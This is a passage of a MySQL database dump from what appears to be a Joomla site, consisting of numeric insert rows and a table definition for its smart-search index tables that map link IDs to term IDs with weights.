(294, 318465, 10.88),
(295, 318702, 0.86331),
(295, 318703, 1.09669),
(295, 318704, 0.32669),
(295, 318705, 1.00331),
(295, 318706, 1.16669),
(295, 318819, 0.86331),
(295, 318820, 1.00331),
(295, 318821, 1.02669),
(298, 320261, 1.09669),
(298, 320262, 1.26),
(298, 320263, 0.93331),
(308, 320263, 0.93331),
(298, 320264, 1.02669),
(308, 320264, 1.02669),
(298, 320265, 1.09669),
(308, 320265, 1.09669),
(298, 320266, 1.16669),
(308, 320266, 1.16669),
(298, 320267, 0.95669),
(308, 320267, 0.95669),
(298, 320268, 1.05),
(308, 320268, 1.05),
(298, 320269, 1.09669),
(308, 320269, 1.09669),
(298, 320423, 0.51331),
(298, 320424, 1.23669),
(298, 320425, 1.4),
(298, 320426, 0.93331),
(308, 320426, 0.93331),
(298, 320427, 1.07331),
(308, 320427, 1.07331),
(298, 320428, 0.95669),
(308, 320428, 0.95669),
(298, 320429, 1.02669),
(308, 320429, 1.02669),
(299, 321189, 0.91),
(299, 321190, 1.05),
(299, 321191, 1.07331),
(299, 321192, 0.88669),
(299, 321193, 0.95669),
(299, 321194, 0.23331),
(299, 321195, 0.88669),
(299, 321196, 0.98),
(299, 321197, 0.86331),
(299, 321198, 0.98),
(299, 321199, 0.86331),
(299, 321200, 1.00331),
(299, 321201, 0.88669),
(299, 321202, 0.98),
(299, 321203, 0.95669),
(299, 321204, 1.26),
(299, 321205, 0.93331),
(299, 321206, 1.12),
(299, 321207, 0.88669),
(299, 321208, 1.07331),
(299, 321209, 0.93331),
(299, 321210, 1.16669),
(299, 321211, 0.95669),
(299, 321212, 0.88669),
(299, 321213, 1.00331),
(299, 321305, 1.09669),
(299, 321306, 1.23669),
(299, 321307, 0.95669),
(299, 321308, 1.07331),
(299, 321309, 1.09669),
(299, 321310, 1.16669),
(299, 321585, 1.00331),
(299, 321586, 1.09669),
(299, 321587, 1.12),
(299, 321588, 1.21331),
(299, 321589, 1.07331),
(299, 321590, 1.19),
(304, 324321, 0.95669),
(305, 324321, 0.95669),
(304, 325193, 0.84),
(304, 325194, 0.95669),
(304, 325195, 0.91),
(304, 325196, 1.19),
(304, 325197, 1.07331),
(304, 325198, 1.14331),
(304, 325199, 1.14331),
(304, 325200, 1.14331),
(304, 325201, 1.19),
(304, 325202, 1.96),
(304, 325203, 1.02669),
(304, 325204, 1.05),
(304, 325205, 2.05338),
(304, 325206, 1.09669),
(304, 325207, 1.14331),
(304, 325208, 1.02669),
(304, 325209, 1.12),
(304, 325210, 1.19),
(304, 325211, 0.95669),
(304, 325212, 1.00331),
(304, 325213, 1.07331),
(304, 325214, 0.88669),
(306, 325214, 1.77338),
(304, 325215, 0.98),
(304, 325216, 0.98),
(304, 325217, 0.95669),
(304, 325218, 0.88669),
(304, 325219, 0.95669),
(304, 325220, 0.88669),
(304, 325221, 0.98),
(304, 325222, 0.93331),
(304, 325223, 1.00331),
(304, 325224, 0.86331),
(304, 325225, 0.93331),
(304, 325465, 0.46669),
(304, 325466, 1.19),
(304, 325467, 1.26),
(304, 325468, 0.32669),
(304, 325469, 0.95669),
(304, 325470, 1.12),
(304, 325471, 0.28),
(304, 325472, 1.07331),
(304, 325473, 1.14331),
(305, 326347, 0.86331),
(305, 326348, 1.09669),
(305, 326349, 1.05),
(305, 326350, 0.93331),
(305, 326351, 1.02669),
(305, 326352, 0.95669),
(305, 326353, 0.93331),
(305, 326354, 1.09669),
(305, 326355, 0.93331),
(305, 326356, 1.16669),
(305, 326357, 0.98),
(305, 326358, 1.07331),
(305, 326359, 1.91338),
(305, 326360, 1.05),
(305, 326361, 1.05),
(305, 326362, 0.93331),
(305, 326363, 1.02669),
(305, 326364, 0.88669),
(305, 326365, 1.05),
(305, 326366, 0.95669),
(305, 326367, 1.07331),
(305, 326368, 0.93331),
(305, 326369, 1.05),
(305, 326370, 0.98),
(305, 326371, 0.91),
(305, 326372, 1.02669),
(305, 326373, 1.12),
(305, 326374, 1.00331),
(305, 326375, 1.07331),
(305, 326376, 1.00331),
(305, 326706, 1.14331),
(305, 326707, 0.98),
(305, 326708, 1.00331),
(306, 327845, 0.91),
(306, 327846, 1.05),
(306, 327847, 0.93331),
(306, 327848, 1.02669),
(306, 327849, 0.91),
(306, 327850, 1.16669),
(306, 327851, 1.02669),
(306, 327852, 1.09669),
(306, 327853, 1.07331),
(306, 327854, 0.95669),
(306, 327855, 1.12),
(306, 327856, 1.02669),
(306, 327857, 0.98),
(306, 327858, 0.95669),
(306, 327859, 1.14331),
(306, 327860, 1.00331),
(306, 327861, 1.23669),
(306, 327862, 0.95669),
(306, 327863, 1.00331),
(306, 327864, 0.86331),
(306, 327865, 0.98),
(306, 327866, 1.00331),
(306, 327867, 0.98),
(306, 327868, 0.86331),
(306, 327869, 0.93331),
(306, 327870, 0.14),
(306, 327871, 0.81669),
(306, 327872, 0.86331),
(306, 327873, 0.32669),
(306, 327874, 0.95669),
(306, 327875, 1.14331),
(306, 328036, 0.88669),
(306, 328037, 1.05),
(306, 328038, 0.88669),
(306, 328039, 0.95669),
(306, 328386, 1.00331),
(306, 328387, 1.16669),
(306, 328388, 1.19),
(306, 328389, 0.91),
(306, 328390, 0.88669),
(306, 328391, 0.98),
(306, 328392, 1.16669),
(306, 328393, 0.88669),
(306, 328394, 1.00331),
(306, 328395, 1.07331),
(306, 328396, 0.88669),
(306, 328397, 1.02669),
(306, 328398, 0.91),
(306, 328399, 0.98),
(308, 328944, 1.26),
(308, 328951, 0.09331),
(308, 328952, 0.95669),
(308, 328953, 1.21331);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_links_terms8`
--

CREATE TABLE `y57u5_finder_links_terms8` (
  `link_id` int(10) UNSIGNED NOT NULL,
  `term_id` int(10) UNSIGNED NOT NULL,
  `weight` float UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `y57u5_finder_links_terms8`
--

INSERT INTO `y57u5_finder_links_terms8` (`link_id`, `term_id`, `weight`) VALUES
(31, 143, 0.60669),
(250, 143, 0.60669),
(251, 143, 0.60669),
(31, 144, 1.12),
(250, 144, 1.12),
(251, 144, 1.12),
(31, 145, 1.21331),
(250, 145, 1.21331),
(251, 145, 1.21331),
(159, 146, 0.14),
(160, 146, 0.14),
(242, 146, 0.14),
(244, 146, 0.14),
(274, 146, 0.14),
(31, 146, 0.28),
(250, 146, 0.28),
(251, 146, 0.28),
(265, 146, 0.28),
(266, 146, 0.28),
(31, 147, 0.84),
(250, 147, 0.84),
(251, 147, 0.84),
(31, 148, 0.93331),
(250, 148, 0.93331),
(251, 148, 0.93331),
(31, 149, 0.84),
(159, 149, 0.84),
(160, 149, 0.84),
(244, 149, 0.84),
(250, 149, 0.84),
(251, 149, 0.84),
(31, 150, 0.93331),
(159, 150, 0.93331),
(160, 150, 0.93331),
(250, 150, 0.93331),
(251, 150, 0.93331),
(31, 151, 0.9334),
(31, 152, 2.8),
(174, 154, 0.23331),
(235, 154, 0.23331),
(237, 154, 0.23331),
(256, 154, 0.23331),
(259, 154, 0.23331),
(260, 154, 0.23331),
(268, 154, 0.23331),
(269, 154, 0.23331),
(270, 154, 0.23331),
(272, 154, 0.23331),
(273, 154, 0.23331),
(275, 154, 0.23331),
(280, 154, 0.23331),
(299, 154, 0.23331),
(301, 154, 0.23331),
(304, 154, 0.23331),
(31, 154, 0.46662),
(159, 154, 0.46662),
(160, 154, 0.46662),
(244, 154, 0.46662),
(250, 154, 0.46662),
(251, 154, 0.46662),
(254, 154, 0.46662),
(255, 154, 0.46662),
(261, 154, 0.46662),
(263, 154, 0.46662),
(287, 154, 0.46662),
(288, 154, 0.46662),
(298, 154, 0.46662),
(308, 154, 0.46662),
(238, 154, 0.69993),
(239, 154, 0.69993),
(242, 154, 0.69993),
(265, 154, 0.69993),
(266, 154, 0.69993),
(306, 154, 0.69993),
(240, 154, 0.93324),
(241, 154, 0.93324),
(233, 154, 1.16655),
(267, 154, 1.16655),
(290, 154, 1.26654),
(193, 154, 1.39986),
(253, 154, 1.63317),
(257, 154, 1.63317),
(305, 154, 1.86648),
(31, 155, 0.88669),
(159, 155, 0.88669),
(160, 155, 0.88669),
(250, 155, 0.88669),
(251, 155, 0.88669),
(31, 156, 1.05),
(159, 156, 1.05),
(160, 156, 1.05),
(250, 156, 1.05),
(251, 156, 1.05),
(31, 157, 0.93331),
(159, 157, 0.93331),
(160, 157, 0.93331),
(250, 157, 0.93331),
(251, 157, 0.93331),
(31, 158, 1.16669),
(159, 158, 1.16669),
(160, 158, 1.16669),
(250, 158, 1.16669),
(251, 158, 1.16669),
(31, 159, 0.23331),
(239, 159, 0.23331),
(250, 159, 0.23331),
(251, 159, 0.23331),
(261, 159, 0.23331),
(273, 159, 0.23331),
(159, 159, 0.46662),
(160, 159, 0.46662),
(255, 159, 0.46662),
(272, 159, 0.46662),
(280, 159, 0.46662),
(295, 159, 0.46662),
(287, 159, 0.79992),
(259, 159, 0.93324),
(260, 159, 0.93324),
(31, 160, 0.88669),
(250, 160, 0.88669),
(251, 160, 0.88669),
(159, 160, 1.77338),
(160, 160, 1.77338),
(31, 161, 0.95669),
(159, 161, 0.95669),
(160, 161, 0.95669),
(250, 161, 0.95669),
(251, 161, 0.95669),
(31, 181, 0.23331),
(160, 181, 0.23331),
(168, 181, 0.23331),
(250, 181, 0.23331),
(251, 181, 0.23331),
(256, 181, 0.23331),
(258, 181, 0.23331),
(262, 181, 0.23331),
(235, 181, 0.39996),
(236, 181, 0.39996),
(237, 181, 0.39996),
(238, 181, 0.39996),
(244, 181, 0.39996),
(245, 181, 0.39996),
(247, 181, 0.39996),
(248, 181, 0.39996),
(249, 181, 0.39996),
(287, 181, 0.39996),
(298, 181, 0.39996),
(299, 181, 0.39996),
(264, 181, 0.46662),
(233, 181, 0.63327),
(242, 181, 0.63327),
(243, 181, 0.63327),
(246, 181, 0.63327),
(47, 181, 1.03323),
(239, 181, 1.56651),
(254, 181, 2.09979),
(306, 181, 2.56641),
(295, 181, 2.76639),
(240, 181, 4.13292),
(241, 181, 4.83285),
(31, 182, 0.88669),
(160, 182, 0.88669),
(239, 182, 0.88669),
(240, 182, 0.88669),
(250, 182, 0.88669),
(251, 182, 0.88669),
(31, 183, 1.00331),
(160, 183, 1.00331),
(250, 183, 1.00331),
(251, 183, 1.00331),
(31, 184, 0.23331),
(159, 184, 0.23331),
(160, 184, 0.23331),
(233, 184, 0.23331),
(241, 184, 0.23331),
(244, 184, 0.23331),
(250, 184, 0.23331),
(251, 184, 0.23331),
(262, 184, 0.23331),
(263, 184, 0.23331),
(264, 184, 0.23331),
(267, 184, 0.23331),
(290, 184, 0.23331),
(295, 184, 0.23331),
(305, 184, 0.23331),
(236, 184, 0.46662),
(246, 184, 0.46662),
(239, 184, 0.69993),
(193, 184, 1.16655),
(31, 185, 0.88669),
(159, 185, 0.88669),
(160, 185, 0.88669),
(250, 185, 0.88669),
(251, 185, 0.88669),
(31, 186, 0.98),
(159, 186, 0.98),
(160, 186, 0.98),
(250, 186, 0.98),
(251, 186, 0.98),
(298, 187, 0.0175),
(295, 187, 0.0525),
(301, 187, 0.07),
(305, 187, 0.07),
(304, 187, 0.0875),
(299, 187, 0.1225),
(237, 187, 0.14),
(245, 187, 0.14),
(248, 187, 0.14),
(262, 187, 0.14),
(268, 187, 0.14),
(274, 187, 0.14),
(308, 187, 0.14),
(256, 187, 0.28),
(267, 187, 0.28),
(275, 187, 0.28),
(241, 187, 0.42),
(249, 187, 0.42),
(258, 187, 0.42),
(265, 187, 0.42),
(266, 187, 0.42),
(31, 187, 0.56),
(159, 187, 0.56),
(160, 187, 0.56),
(161, 187, 0.56),
(239, 187, 0.56),
(243, 187, 0.56),
(251, 187, 0.56),
(253, 187, 0.56),
(257, 187, 0.56),
(270, 187, 0.56),
(236, 187, 0.62),
(244, 187, 0.7),
(246, 187, 0.7),
(255, 187, 0.7),
(264, 187, 0.7),
(287, 187, 0.76),
(247, 187, 0.84),
(259, 187, 0.84),
(260, 187, 0.84),
(233, 187, 0.98),
(252, 187, 0.98),
(254, 187, 0.98),
(269, 187, 0.98),
(272, 187, 0.98),
(280, 187, 0.98),
(288, 187, 0.98),
(242, 187, 1.12),
(263, 187, 1.12),
(292, 187, 1.12),
(261, 187, 1.26),
(240, 187, 1.54),
(168, 187, 1.6),
(193, 187, 1.68),
(250, 187, 1.7),
(178, 187, 1.74),
(235, 187, 1.82),
(238, 187, 1.82),
(306, 187, 3.5),
(174, 187, 3.52),
(31, 188, 0.88669),
(159, 188, 0.88669),
(160, 188, 0.88669),
(250, 188, 0.88669),
(251, 188, 0.88669),
(31, 189, 1.02669),
(159, 189, 1.02669),
(160, 189, 1.02669),
(250, 189, 1.02669),
(251, 189, 1.02669),
(31, 190, 0.88669),
(159, 190, 0.88669),
(160, 190, 0.88669),
(250, 190, 0.88669),
(251, 190, 0.88669),
(31, 191, 1.02669),
(159, 191, 1.02669),
(160, 191, 1.02669),
(250, 191, 1.02669),
(251, 191, 1.02669),
(31, 192, 0.84),
(159, 192, 0.84),
(160, 192, 0.84),
(246, 192, 0.84),
(250, 192, 0.84),
(251, 192, 0.84),
(306, 192, 0.84),
(31, 193, 0.93331),
(159, 193, 0.93331),
(160, 193, 0.93331),
(250, 193, 0.93331),
(251, 193, 0.93331),
(306, 193, 0.93331),
(31, 194, 0.88669),
(159, 194, 0.88669),
(160, 194, 0.88669),
(250, 194, 0.88669),
(251, 194, 0.88669),
(255, 194, 1.77338),
(31, 195, 0.95669),
(159, 195, 0.95669),
(160, 195, 0.95669),
(250, 195, 0.95669),
(251, 195, 0.95669),
(31, 196, 0.32669),
(168, 196, 0.32669),
(240, 196, 0.32669),
(250, 196, 0.32669),
(251, 196, 0.32669),
(295, 196, 0.32669),
(299, 196, 0.32669),
(31, 197, 1.00331),
(250, 197, 1.00331),
(251, 197, 1.00331),
(31, 198, 1.07331),
(250, 198, 1.07331),
(251, 198, 1.07331),
(31, 201, 0.18669),
(159, 201, 0.18669),
(160, 201, 0.18669),
(178, 201, 0.18669),
(236, 201, 0.18669),
(250, 201, 0.18669),
(251, 201, 0.18669),
(275, 201, 0.18669),
(299, 201, 0.18669),
(238, 201, 0.56007),
(31, 202, 0.86331),
(159, 202, 0.86331),
(160, 202, 0.86331),
(236, 202, 0.86331),
(250, 202, 0.86331),
(251, 202, 0.86331),
(299, 202, 0.86331),
(238, 202, 1.72662),
(31, 203, 0.98),
(159, 203, 0.98),
(160, 203, 0.98),
(250, 203, 0.98),
(251, 203, 0.98),
(306, 221, 0.18669),
(160, 221, 0.93345),
(31, 221, 1.12014),
(250, 221, 1.12014),
(251, 221, 1.12014),
(193, 221, 1.8669),
(159, 221, 2.45364),
(31, 222, 0.93331),
(159, 222, 0.93331),
(160, 222, 0.93331),
(250, 222, 0.93331),
(251, 222, 0.93331),
(31, 223, 1.05),
(159, 223, 1.05),
(160, 223, 1.05),
(250, 223, 1.05),
(251, 223, 1.05),
(31, 224, 0.88669),
(159, 224, 0.88669),
(160, 224, 0.88669),
(250, 224, 0.88669),
(251, 224, 0.88669),
(31, 225, 1.00331),
(159, 225, 1.00331),
(160, 225, 1.00331),
(250, 225, 1.00331),
(251, 225, 1.00331),
(31, 226, 0.88669),
(159, 226, 0.88669),
(160, 226, 0.88669),
(193, 226, 0.88669),
(250, 226, 0.88669),
(251, 226, 0.88669),
(31, 227, 0.98),
(159, 227, 0.98),
(160, 227, 0.98),
(250, 227, 0.98),
(251, 227, 0.98),
(31, 228, 0.91),
(159, 228, 0.91),
(160, 228, 0.91),
(250, 228, 0.91),
(251, 228, 0.91),
(31, 229, 1.02669),
(159, 229, 1.02669),
(160, 229, 1.02669),
(250, 229, 1.02669),
(251, 229, 1.02669),
(31, 230, 0.91),
(193, 230, 0.91),
(250, 230, 0.91),
(251, 230, 0.91),
(31, 231, 0.98),
(250, 231, 0.98),
(251, 231, 0.98),
(31, 232, 0.91),
(160, 232, 0.91),
(250, 232, 0.91),
(251, 232, 0.91),
(159, 232, 8.32),
(31, 233, 1.02669),
(160, 233, 1.02669),
(250, 233, 1.02669),
(251, 233, 1.02669),
(159, 233, 9.38688),
(298, 234, 0.01169),
(304, 234, 0.02338),
(305, 234, 0.02338),
(299, 234, 0.03507),
(168, 234, 0.09331),
(237, 234, 0.09331),
(238, 234, 0.09331),
(240, 234, 0.09331),
(244, 234, 0.09331),
(247, 234, 0.09331),
(252, 234, 0.09331),
(253, 234, 0.09331),
(262, 234, 0.09331),
(267, 234, 0.09331),
(268, 234, 0.09331),
(272, 234, 0.09331),
(273, 234, 0.09331),
(274, 234, 0.09331),
(280, 234, 0.09331),
(308, 234, 0.09331),
(233, 234, 0.18662),
(239, 234, 0.18662),
(249, 234, 0.18662),
(257, 234, 0.18662),
(290, 234, 0.18662),
(292, 234, 0.18662),
(159, 234, 0.27993),
(160, 234, 0.27993),
(243, 234, 0.27993),
(248, 234, 0.27993),
(263, 234, 0.27993),
(31, 234, 0.37324),
(235, 234, 0.37324),
(241, 234, 0.37324),
(250, 234, 0.37324),
(251, 234, 0.37324),
(261, 234, 0.37324),
(288, 234, 0.37324),
(174, 234, 0.46655),
(269, 234, 0.46655),
(242, 234, 0.55986),
(306, 234, 0.65317),
(275, 234, 1.03974),
(159, 235, 0.81669),
(160, 235, 0.81669),
(239, 235, 0.81669),
(31, 235, 1.63338),
(250, 235, 1.63338),
(251, 235, 1.63338),
(31, 236, 0.91),
(250, 236, 0.91),
(251, 236, 0.91),
(31, 237, 0.93331),
(159, 237, 0.93331),
(160, 237, 0.93331),
(250, 237, 0.93331),
(251, 237, 0.93331),
(235, 238, 0.84),
(238, 238, 0.84),
(239, 238, 0.84),
(240, 238, 0.84),
(247, 238, 0.84),
(252, 238, 0.84),
(261, 238, 0.84),
(268, 238, 0.84),
(272, 238, 0.84),
(280, 238, 0.84),
(290, 238, 0.84),
(292, 238, 0.84),
(299, 238, 0.84),
(304, 238, 0.84),
(305, 238, 0.84),
(306, 238, 0.84),
(31, 238, 1.68),
(159, 238, 1.68),
(160, 238, 1.68),
(174, 238, 1.68),
(242, 238, 1.68),
(243, 238, 1.68),
(249, 238, 1.68),
(250, 238, 1.68),
(251, 238, 1.68),
(257, 238, 1.68),
(269, 238, 1.68),
(248, 238, 2.52),
(263, 238, 2.52),
(241, 238, 3.36),
(288, 238, 3.36),
(275, 238, 8.52),
(31, 239, 0.98),
(159, 239, 0.98),
(160, 239, 0.98),
(250, 239, 0.98),
(251, 239, 0.98),
(31, 240, 0.98),
(159, 240, 0.98),
(160, 240, 0.98),
(239, 240, 0.98),
(241, 240, 0.98),
(250, 240, 0.98),
(251, 240, 0.98),
(306, 240, 0.98),
(295, 241, 0.01169),
(301, 241, 0.04676),
(298, 241, 0.05845),
(159, 241, 0.09331),
(299, 241, 0.09352),
(304, 241, 0.1169),
(305, 241, 0.1169),
(31, 241, 0.27993),
(245, 241, 0.27993),
(247, 241, 0.27993),
(250, 241, 0.27993),
(251, 241, 0.27993),
(160, 241, 0.37324),
(249, 241, 0.37324),
(270, 241, 0.37324),
(290, 241, 0.37324),
(233, 241, 0.46655),
(237, 241, 0.46655),
(246, 241, 0.46655),
(248, 241, 0.46655),
(264, 241, 0.46655),
(272, 241, 0.46655),
(280, 241, 0.46655),
(287, 241, 0.46655),
(308, 241, 0.46655),
(168, 241, 0.55986),
(268, 241, 0.55986),
(269, 241, 0.55986),
(273, 241, 0.55986),
(252, 241, 0.65317),
(254, 241, 0.65317),
(275, 241, 0.65317),
(255, 241, 0.74648),
(263, 241, 0.74648),
(292, 241, 0.74648),
(241, 241, 0.83979),
(267, 241, 0.83979),
(244, 241, 0.97309),
(257, 241, 1.11972),
(262, 241, 1.11972),
(274, 241, 1.11972),
(235, 241, 1.21303),
(236, 241, 1.21303),
(256, 241, 1.30634),
(261, 241, 1.30634),
(265, 241, 1.39965),
(266, 241, 1.39965),
(258, 241, 1.49296),
(288, 241, 1.49296),
(174, 241, 1.58627),
(259, 241, 1.58627),
(260, 241, 1.58627),
(253, 241, 1.67958),
(306, 241, 1.67958),
(238, 241, 1.69291),
(193, 241, 1.8662),
(239, 241, 2.55936),
(243, 241, 2.62601),
(240, 241, 2.65267),
(178, 241, 3.54578),
(242, 241, 3.58577),
(193, 242, 0.86331),
(236, 242, 0.86331),
(237, 242, 0.86331),
(239, 242, 0.86331),
(252, 242, 0.86331),
(258, 242, 0.86331),
(261, 242, 0.86331),
(262, 242, 0.86331),
(263, 242, 0.86331),
(264, 242, 0.86331),
(265, 242, 0.86331),
(266, 242, 0.86331),
(274, 242, 0.86331),
(299, 242, 0.86331),
(304, 242, 0.86331),
(306, 242, 0.86331),
(31, 242, 1.72662),
(160, 242, 1.72662),
(238, 242, 1.72662),
(243, 242, 1.72662),
(250, 242, 1.72662),
(251, 242, 1.72662),
(268, 242, 1.72662),
(288, 242, 1.72662),
(305, 242, 1.72662),
(256, 242, 2.58993),
(240, 242, 3.45324),
(255, 242, 3.45324),
(257, 242, 3.45324),
(174, 242, 4.31655),
(259, 242, 4.31655),
(260, 242, 4.31655),
(242, 242, 5.17986),
(253, 242, 6.04317),
(31, 243, 1.09669),
(160, 243, 1.09669),
(250, 243, 1.09669),
(251, 243, 1.09669),
(31, 244, 0.95669),
(160, 244, 0.95669),
(250, 244, 0.95669),
(251, 244, 0.95669),
(31, 245, 0.95669),
(160, 245, 0.95669),
(250, 245, 0.95669),
(251, 245, 0.95669),
(265, 245, 0.95669),
(266, 245, 0.95669),
(31, 246, 1.07331),
(160, 246, 1.07331),
(250, 246, 1.07331),
(251, 246, 1.07331),
(31, 250, 0.51331),
(159, 250, 0.51331),
(160, 250, 0.51331),
(250, 250, 0.51331),
(251, 250, 0.51331),
(31, 251, 1.07331),
(159, 251, 1.07331),
(160, 251, 1.07331),
(250, 251, 1.07331),
(251, 251, 1.07331),
(31, 252, 1.28331),
(159, 252, 1.28331),
(160, 252, 1.28331),
(250, 252, 1.28331),
(251, 252, 1.28331),
(31, 253, 0.42),
(250, 253, 0.42),
(251, 253, 0.42),
(263, 253, 0.42),
(31, 254, 1.00331),
(250, 254, 1.00331),
(251, 254, 1.00331),
(31, 255, 1.12),
(250, 255, 1.12),
(251, 255, 1.12),
(295, 256, 0.01169),
(298, 256, 0.05845),
(301, 256, 0.05845),
(161, 256, 0.09331),
(168, 256, 0.09331),
(305, 256, 0.14028),
(304, 256, 0.18704),
(299, 256, 0.21209),
(248, 256, 0.27993),
(256, 256, 0.27993),
(244, 256, 0.37324),
(245, 256, 0.37324),
(247, 256, 0.37324),
(290, 256, 0.37324),
(31, 256, 0.46655),
(159, 256, 0.46655),
(160, 256, 0.46655),
(251, 256, 0.46655),
(270, 256, 0.46655),
(275, 256, 0.46655),
(308, 256, 0.46655),
(233, 256, 0.55986),
(263, 256, 0.55986),
(264, 256, 0.55986),
(265, 256, 0.65317),
(266, 256, 0.65317),
(272, 256, 0.65317),
(280, 256, 0.65317),
(253, 256, 0.74648),
(257, 256, 0.74648),
(269, 256, 0.74648),
(236, 256, 0.83979),
(268, 256, 0.83979),
(273, 256, 0.87978),
(246, 256, 1.02641),
(259, 256, 1.02641),
(260, 256, 1.02641),
(267, 256, 1.02641),
(288, 256, 1.02641),
(292, 256, 1.02641),
(178, 256, 1.11972),
(237, 256, 1.11972),
(250, 256, 1.22636),
(174, 256, 1.30634),
(258, 256, 1.30634),
(262, 256, 1.30634),
(239, 256, 1.39965),
(254, 256, 1.49296),
(255, 256, 1.49296),
(274, 256, 1.50629),
(238, 256, 1.58627),
(252, 256, 1.58627),
(261, 256, 1.58627),
(243, 256, 1.67958),
(241, 256, 1.8662),
(242, 256, 1.8662),
(193, 256, 1.95951),
(240, 256, 2.05282),
(235, 256, 2.14613),
(306, 256, 2.51937),
(31, 257, 0.79331),
(159, 257, 0.79331),
(160, 257, 0.79331),
(161, 257, 0.79331),
(178, 257, 0.79331),
(193, 257, 0.79331),
(236, 257, 0.79331),
(238, 257, 0.79331),
(239, 257, 0.79331),
(240, 257, 0.79331),
(241, 257, 0.79331),
(242, 257, 0.79331),
(243, 257, 0.79331),
(245, 257, 0.79331),
(247, 257, 0.79331),
(250, 257, 0.79331),
(251, 257, 0.79331),
(255, 257, 0.79331),
(256, 257, 0.79331),
(257, 257, 0.79331),
(259, 257, 0.79331),
(260, 257, 0.79331),
(261, 257, 0.79331),
(263, 257, 0.79331),
(268, 257, 0.79331),
(269, 257, 0.79331),
(270, 257, 0.79331),
(298, 257, 0.79331),
(301, 257, 0.79331),
(308, 257, 0.79331),
(174, 257, 1.58662),
(246, 257, 1.58662),
(262, 257, 1.58662),
(290, 257, 1.58662),
(292, 257, 1.58662),
(305, 257, 1.58662),
(253, 257, 2.37993),
(272, 257, 2.37993),
(280, 257, 2.37993),
(299, 257, 2.37993),
(235, 257, 3.17324),
(237, 257, 3.17324),
(252, 257, 3.17324),
(254, 257, 3.96655),
(31, 258, 0.91),
(159, 258, 0.91),
(160, 258, 0.91),
(250, 258, 0.91),
(251, 258, 0.91),
(31, 259, 0.84),
(159, 259, 0.84),
(160, 259, 0.84),
(233, 259, 0.84),
(238, 259, 0.84),
(240, 259, 0.84),
(242, 259, 0.84),
(250, 259, 0.84),
(251, 259, 0.84),
(256, 259, 0.84),
(259, 259, 0.84),
(260, 259, 0.84),
(262, 259, 0.84),
(267, 259, 0.84),
(273, 259, 0.84),
(275, 259, 0.84),
(288, 259, 0.84),
(292, 259, 0.84),
(305, 259, 0.84),
(174, 259, 1.68),
(235, 259, 1.68),
(243, 259, 1.68),
(252, 259, 1.68),
(261, 259, 1.68),
(268, 259, 1.68),
(269, 259, 1.68),
(304, 259, 1.68),
(193, 259, 2.52),
(241, 259, 2.52),
(255, 259, 2.52),
(306, 259, 2.52),
(31, 260, 0.93331),
(159, 260, 0.93331),
(160, 260, 0.93331),
(242, 260, 0.93331),
(250, 260, 0.93331),
(251, 260, 0.93331),
(256, 260, 0.93331),
(306, 260, 0.93331),
(241, 260, 1.86662),
(243, 261, 0.84),
(247, 261, 0.84),
(253, 261, 0.84),
(254, 261, 0.84),
(261, 261, 0.84),
(267, 261, 0.84),
(270, 261, 0.84),
(290, 261, 0.84),
(299, 261, 0.84),
(301, 261, 0.84),
(304, 261, 0.84),
(178, 261, 1.68),
(233, 261, 1.68),
(252, 261, 1.68),
(264, 261, 1.68),
(31, 261, 2.52),
(159, 261, 2.52),
(160, 261, 2.52),
(236, 261, 2.52),
(241, 261, 2.52),
(242, 261, 2.52),
(250, 261, 2.52),
(251, 261, 2.52),
(274, 261, 2.52),
(240, 261, 3.36),
(288, 261, 3.36),
(306, 261, 3.36),
(174, 261, 4.2),
(258, 261, 4.2),
(262, 261, 4.2),
(31, 262, 0.95669),
(159, 262, 0.95669),
(160, 262, 0.95669),
(250, 262, 0.95669),
(251, 262, 0.95669),
(31, 263, 0.93331),
(159, 263, 0.93331),
(160, 263, 0.93331),
(250, 263, 0.93331),
(251, 263, 0.93331),
(31, 264, 0.93331),
(159, 264, 0.93331),
(160, 264, 0.93331),
(250, 264, 0.93331),
(251, 264, 0.93331),
(258, 264, 0.93331),
(299, 265, 0.03507),
(301, 265, 0.04676),
(304, 265, 0.08183),
(305, 265, 0.08183),
(233, 265, 0.09331),
(245, 265, 0.09331),
(247, 265, 0.09331),
(290, 265, 0.09331),
(161, 265, 0.18662),
(244, 265, 0.18662),
(246, 265, 0.18662),
(275, 265, 0.18662),
(168, 265, 0.27993),
(235, 265, 0.27993),
(243, 265, 0.27993),
(248, 265, 0.27993),
(259, 265, 0.27993),
(260, 265, 0.27993),
(264, 265, 0.27993),
(265, 265, 0.27993),
(266, 265, 0.27993),
(273, 265, 0.27993),
(274, 265, 0.27993),
(288, 265, 0.27993),
(174, 265, 0.37324),
(249, 265, 0.37324),
(270, 265, 0.37324),
(237, 265, 0.46655),
(263, 265, 0.46655),
(236, 265, 0.55986),
(238, 265, 0.55986),
(240, 265, 0.55986),
(257, 265, 0.55986),
(262, 265, 0.55986),
(159, 265, 0.65317),
(160, 265, 0.65317),
(267, 265, 0.65317),
(31, 265, 0.74648),
(178, 265, 0.74648),
(239, 265, 0.74648),
(250, 265, 0.74648),
(251, 265, 0.74648),
(258, 265, 0.74648),
(268, 265, 0.74648),
(272, 265, 0.74648),
(280, 265, 0.74648),
(255, 265, 0.83979),
(261, 265, 0.83979),
(269, 265, 0.83979),
(253, 265, 0.94643),
(241, 265, 1.02641),
(242, 265, 1.02641),
(256, 265, 1.02641),
(306, 265, 1.02641),
(193, 265, 1.11972),
(254, 265, 1.30634),
(31, 266, 0.84),
(174, 266, 0.84),
(178, 266, 0.84),
(237, 266, 0.84),
(250, 266, 0.84),
(251, 266, 0.84),
(304, 266, 0.84),
(31, 267, 1.07331),
(250, 267, 1.07331),
(251, 267, 1.07331),
(31, 268, 0.91),
(159, 268, 0.91),
(160, 268, 0.91),
(250, 268, 0.91),
(251, 268, 0.91),
(31, 269, 1.02669),
(159, 269, 1.02669),
(160, 269, 1.02669),
(250, 269, 1.02669),
(251, 269, 1.02669),
(31, 270, 0.88669),
(159, 270, 0.88669),
(160, 270, 0.88669),
(250, 270, 0.88669),
(251, 270, 0.88669),
(31, 271, 0.95669),
(159, 271, 0.95669),
(160, 271, 0.95669),
(250, 271, 0.95669),
(251, 271, 0.95669),
(31, 272, 0.81669),
(159, 272, 0.81669),
(160, 272, 0.81669),
(250, 272, 0.81669),
(251, 272, 0.81669),
(31, 273, 0.91),
(159, 273, 0.91),
(160, 273, 0.91),
(250, 273, 0.91),
(251, 273, 0.91),
(174, 274, 0.81669),
(235, 274, 0.81669),
(238, 274, 0.81669),
(242, 274, 0.81669),
(246, 274, 0.81669),
